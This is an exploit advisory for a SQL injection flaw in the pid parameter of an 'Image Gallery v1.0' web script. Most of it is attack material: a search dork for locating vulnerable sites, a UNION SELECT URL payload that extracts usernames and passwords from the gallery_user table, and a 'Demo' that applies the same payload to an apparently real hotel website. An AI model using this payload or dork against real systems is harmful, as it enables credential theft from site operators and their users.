Image Gallery v1.0 (pid) Remote SQL Injection Vulnerability
___________________________________

Author : Hussin X

Home : IQ-SecuriTY >   www.IQ-TY.com  

Mail  :  darkangel_G85@yahoo.com

___________________________________

script  : http://www.elkagroup.com

DorK : "Powered by : elkagroup.com"

exploit :
_______

http://www.site.com/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--



Demo :
_______

http://www.abbasihotel.com/gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--


Coding password : mysql